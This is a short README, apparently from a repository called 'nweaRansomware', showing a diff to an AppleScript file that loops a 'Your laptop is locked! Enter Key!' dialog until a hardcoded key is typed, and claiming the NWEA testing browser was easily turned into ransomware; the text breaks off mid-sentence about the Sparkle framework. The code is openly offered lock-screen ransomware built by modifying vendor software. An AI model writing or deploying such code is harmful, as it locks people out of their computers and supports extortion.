1paton/nweaRansomware/README.md

 Code added to "QuitProcesses.applescript":

+Code:

 	repeat

-	set protectCode to display dialog "!Your laptop is locked! !Enter Key!" default answer "" buttons {"Unlock With Key"}
+		set protectCode to display dialog "!Your laptop is locked! !Enter Key!" default answer "" buttons {"Unlock"}

 		if text returned of protectCode is "ioZevo#^Github" then

 			tell application "nwea browser exploited"

 				quit

 			end tell

 		end if

 	end repeat

 Sadly NWEA has done a horrible job of securing their code, making it easy to convert their program into simple Ransomeware.
 The Sparkle framework, which includes a function to check if code has been